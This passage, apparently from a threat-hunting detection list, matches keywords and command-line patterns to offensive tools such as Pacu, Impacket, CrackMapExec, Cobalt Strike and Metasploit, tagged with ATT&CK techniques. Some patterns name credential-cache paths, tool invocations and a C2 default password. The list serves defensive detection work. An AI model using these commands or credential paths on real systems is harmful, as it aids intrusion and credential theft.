TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*package_cvs_into_lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*package=impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PackMyPayload.py*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*PackMyPayload-master*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*pacu --exec *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --list-modules*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-args=*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-info*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-name *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --session *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --set-regions *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --whoami*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu/core pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu/last_update.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu-master.zip*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*padekgcemlokbadohgkifijomclgjgif*,greyware_tool_keyword,Proxy SwitchyOmega,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*padlock2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*padre -u *http*://*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*padre-master.zip*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*papacat -l -p *,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*ParamPamPam*,offensive_tool_keyword,ParamPamPam,This tool is used for brute discover GET and POST parameters.,T1110 - T1210 - T1211,TA0001 - TA0002 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/ParamPamPam,1,1,N/A,N/A,3,244,60,2022-06-27T11:45:19Z,2018-11-10T08:38:30Z -*parrot*security.vdi*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*parrotsec.org/download/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Parrot-security-*.iso*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*parse_aggressor_properties*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*parse_nessus_file*,offensive_tool_keyword,crackmapexec,function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*parse_nmap_xml*,offensive_tool_keyword,crackmapexec,function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*parse_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*ParseMSALCache*.azure\msal_token_cache.bin*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*parser.exe -a *.dmp*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*parser.exe -a *.dmp*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*PassDetective extract*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*PassDetective-main.*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*passhunt.exe*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*passhunt.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*passhunt.py*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*passivex.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*passivex.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*passphrase-rule1.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*passphrase-rule2.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*passphrase-wordlist*,offensive_tool_keyword,passphrase-wordlist,This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.,T1003 - T1110 - T1113 - T1137,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/initstring/passphrase-wordlist,1,0,N/A,N/A,10,989,149,2023-03-16T03:22:53Z,2017-12-05T20:53:13Z -*pass-station search tomcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PassTheCert.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PassTheChallenge.cpp*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.exe*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.pdb*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.sln*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.vcxproj*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*passthehashbrowns/BOFMask*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*passware-kit-forensic.sls*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PasswareKitForensic_*_Setup.dmg*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PasswareKitForensic_*_Setup.msi*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passware-kit-forensic-64bit.msi*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwd*john*,greyware_tool_keyword,passwd,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*password = 'tdragon6'*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*Password*Winter2017*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*password_box.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*password_cracker.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*password_crackers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Password_Cracking.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*password_prompt_spoof.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 